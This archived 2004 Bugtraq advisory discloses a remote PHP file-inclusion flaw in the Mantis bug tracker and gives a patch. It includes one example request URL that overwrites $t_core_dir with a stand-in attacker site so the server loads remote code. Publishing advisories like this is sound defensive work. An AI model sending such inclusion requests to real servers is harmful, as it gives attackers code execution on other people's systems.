lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20040820230541.11256.qmail@www.securityfocus.com>
Date: 20 Aug 2004 23:05:41 -0000
From: Jose Antonio <joxeankoret@...oo.es>
To: bugtraq@...urityfocus.com
Subject: Mantis Bugtracker Remote PHP Code Execution Vulnerability




--------------------------------------------------------------------------- 
           Mantis Bugtracker Remote PHP Code 
Execution Vulnerability 
--------------------------------------------------------------------------- 
 
Author: Joxean Koret 
Date: 08-01-2004 
Location: Basque Country 
 
--------------------------------------------------------------------------- 
 
Affected software description: 
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
 
 
Mantis Bugtracker 
 
Mantis is a web-based bugtracking system. It is 
written in the PHP scripting  
language and requires the MySQL database and 
a webserver.  
 
--------------------------------------------------------------------------- 
 
Vulnerabilities: 
~~~~~~~~~~~~~~~~ 
 
A. Remote PHP Code Execution Vulnerability 
 
A1. If the REGISTER_GLOBAL variable is set an 
attacker can execute arbitrary  
php code by overwriting the global variable 
$t_core_dir with our desired url  
(for example 
http://localhost/mantis/core/bug_api.php?t_core_dir=http://fucking.site.com/) 
  
 The following files are vulnerables :  
  
 bug_api.php -> at line 22? (using variable 
$t_core_path) 
 relationship_api.php -> Line 14 (using variable 
$t_core_dir) 
 
The fix: 
~~~~~~~~ 
 
Both of these issues have now been fixed in 
CVS.  
 
There is also a Patch for the Mantis 0.19.0a 
version  
 
===================================================================== 
mantis.patch 
 
bug_api.php 
 @@ -19,7 +19,7 @@ 
      require_once( $t_core_dir . 
'sponsorship_api.php' ); 
   
      # MASC RELATIONSHIP 
 - 
require_once( $t_core_path.'relationship_api.php' ); 
 + 
require_once( $t_core_dir.'relationship_api.php' ); 
      # MASC RELATIONSHIP 
  
 and to relationship API: 
      ### Relationship API ### 
   
 + $t_core_dir = 
dirname( __FILE__ ).DIRECTORY_SEPARATOR; 
 + 
      require_once( $t_core_dir . 
'collapse_api.php' ); 
   
      # MASC RELATIONSHIP  
 
===================================================================== 
--------------------------------------------------------------------------- 
Contact: 
~~~~~~~~ 
 
	Joxean Koret at 
joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es 
 
 
 


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ